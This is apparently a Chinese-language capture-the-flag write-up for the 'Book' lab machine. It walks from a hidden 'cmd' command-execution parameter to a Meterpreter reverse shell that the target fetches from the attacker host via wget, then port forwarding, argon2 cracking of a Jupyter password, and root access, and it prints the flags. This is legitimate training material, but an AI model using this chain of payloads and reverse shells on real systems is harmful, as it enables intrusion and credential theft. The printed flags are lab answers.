MazeSec-Book

端口扫描

┌──(kali㉿kali)-[~/HMV/book]
└─$ sudo nmap -p- 192.168.43.12          
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-15 15:36 CST
Nmap scan report for Book (192.168.43.12)
Host is up (0.0015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
MAC Address: C6:08:CB:68:1C:66 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.33 seconds

web渗透

开启了 80 和 443 端口，访问 80 端口之后，给我重定向到了 HTTPS，进去是个开源的 csTimer ，魔方训练用的计时器：

一开始的时候在 web 上尝试了挺长时间的，但都没有找到哪里有入口点。

后来看了群友的 wp ，发现居然在主页面里面藏了一个可以进行命令执行的参数 cmd ，这个得自己 FUZZ 出来，也是没想到。

FUZZ 一下看看：

┌──(kali㉿kali)-[~/HMV/book]
└─$ wfuzz -u 'http://192.168.43.12/?FUZZ=id' -w /usr/share/wordlists/fuzzDicts/paramDict/AllParam.txt --hh 54850
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.43.12/?FUZZ=id
Total requests: 74332

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                           
=====================================================================

000002798:   200        358 L    4242 W     54903 Ch    "cmd"

FUZZ 出来有个 cmd 参数和别的响应不太一样，访问之后，发现回显里面有命令执行的内容：

┌──(kali㉿kali)-[~/HMV/book]
└─$ curl 'http://192.168.43.12?cmd=id'    
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html manifest="cache.manifest">
 <head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="default">
  <meta name="format-detection" content="telephone=no">
  …………
  …………
  </tbody></table>
  </body></html>
  uid=33(www-data) gid=33(www-data) groups=33(www-data)

获取立足点

然后尝试进行反弹 shell ，但是用 busybox nc 和正常的 bash 进行反弹 shell 都没有成功，因而想到上传一个 meterpreter 的木马好了：

┌──(kali㉿kali)-[~/HMV/book]
└─$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.43.68 LPORT=4444 -f elf -o payload
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068952 bytes
Final size of elf file: 1068952 bytes
Saved as: payload

┌──(kali㉿kali)-[~/HMV/book]
└─$ file payload
payload: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped

开个 http.server ，然后用命令执行把 payload 传上去：

┌──(kali㉿kali)-[~/HMV/book]
└─$ python3 -m http.server

┌──(kali㉿kali)-[~/HMV/book]
└─$ curl 'http://192.168.43.12?cmd=cd%20/tmp;wget%20http://192.168.43.68:8000/payload'

然后在 msf 里面，开启meterpreter 反弹 shell 的监听：

┌──(kali㉿kali)-[~/HMV/book]
└─$ msfconsole
Metasploit tip: View missing module options with show missing
                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v6.4.56-dev                          ]
+ -- --=[ 2505 exploits - 1291 auxiliary - 431 post       ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.43.68
LHOST => 192.168.43.68
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.43.68:4444

记得一定要设置一下 payload 为刚才我们用 msfvenom 生成的木马的 payload，因为默认的 payload 为 generic/shell_reverse_tcp ，如果不设置，反弹 shell 的时候会显示 Command shell session 9 is not valid and will be closed ，shell 就弹不回来。

然后在靶机上运行我们刚才传上去的 payload:

┌──(kali㉿kali)-[~/HMV/book]
└─$ curl 'http://192.168.43.12?cmd=chmod%20+x%20/tmp/payload;/tmp/payload'

然后 msf 这边 shell 就弹回来了：

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.43.68:4444 
[*] Meterpreter session 1 opened (192.168.43.68:4444 -> 192.168.43.12:56318) at 2025-08-15 16:25:24 +0800

meterpreter > shell
Process 2270 created.
Channel 1 created.
whoami
www-data

提权

查看靶机端口开放情况，发现有一个多余的 8888 端口开在了本地：

www-data@Book:~/html$ ss -tuln
ss -tuln
Netid   State    Recv-Q   Send-Q     Local Address:Port      Peer Address:Port  
udp     UNCONN   0        0                0.0.0.0:68             0.0.0.0:*                
tcp     LISTEN   0        128              0.0.0.0:22             0.0.0.0:*     
tcp     LISTEN   0        128            127.0.0.1:8888           0.0.0.0:*        
tcp     LISTEN   0        128                    *:80                   *:*     
tcp     LISTEN   0        128                 [::]:22                [::]:*     
tcp     LISTEN   0        128                    *:443                  *:*     
www-data@Book:~/html$

用 msf 本身就有的 portfwd ，把靶机的 8888 端口给转发出来：

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -h   Help banner.
    -i   Index of the port forward entry to interact with (see the "list" command).
    -l   Forward: local port to listen on. Reverse: local port to connect to.
    -L   Forward: local host to listen on (optional). Reverse: local host to connect to.
    -p   Forward: remote port to connect to. Reverse: remote port to listen on.
    -r   Forward: remote host to connect to.
    -R   Indicates a reverse port forward.

meterpreter > portfwd add -l 8888 -p 8888 -r 127.0.0.1
[*] Forward TCP relay created: (local) :8888 -> (remote) 127.0.0.1:8888

然后就去访问我们本地的 127.0.0.1:8888 :

发现是个 jupyter 的登录页面，尝试了几个弱密码，发现都不对。

想到密码可能藏在靶机里的某个地方，在靶机里找找跟 jupyter 有关的文件：

www-data@Book:~/html$ find / -name '*jupyter*' 2>/dev/null
…………
…………
/var/backups/jupyter_server_config.json
www-data@Book:~/html$

找到了那个 config 文件，看一下：

www-data@Book:~/html$ cat /var/backups/jupyter_server_config.json
cat /var/backups/jupyter_server_config.json
{
  "IdentityProvider": {
    "hashed_password": "argon2:$argon2id$v=19$m=10240,t=10,p=8$FLuM1EM1nn/EP9ni1ust1A$BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4"
  }
}www-data@Book:~/html$

发现里面有个 argon2 算法的密码，在网上找了个脚本(https://github.com/p0dalirius/Argon2Cracker/blob/main/Argon2Cracker.py)，用这个脚本破解一下：

┌──(kali㉿kali)-[~/Tools/Argon2_Cracker]
└─$ python3 Argon2Cracker.py -w 5000.txt -v '$argon2id$v=19$m=10240,t=10,p=8$FLuM1EM1nn/EP9ni1ust1A$BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4'  
/home/kali/Tools/Argon2_Cracker/Argon2Cracker.py:18: SyntaxWarning: invalid escape sequence '\$'
  matched = re.search('^\$(argon2(i|d|id))\$v=([0-9]+)\$([tpm=0-9,]+)\$([a-zA-Z0-9/\+]+)\$([a-zA-Z0-9/\+]+)', hash)
Argon2Cracker - v1.0 - by Remi GASCOU (Podalirius)

[>] Loading wordlist ... done. (5000 candidates loaded)
Version:  19 
Params:  m=10240,t=10,p=8 
Salt:  FLuM1EM1nn/EP9ni1ust1A 
Hash:  BSnZUgXixY8B0Tzmffcz/9Zo9cvEO/PeAu8zw/iYNI4 

[2025/08/15 15h10m21s] Status (4494/5000) 89.88 % | Rate 44 H/s        
[>] Found: star123 

破解出来密码是 star123 ，登录 8888 端口：

进去就能看到 root flag.

然后在 File 按钮里面，可以创建一个 Terminal，直接就是 root 用户：

user flag: flag{user-a81e1f271bc4a3dd4ac87827da4d0a78}
root flag: flag{root-4f98663772651c870e911982e991d0d9}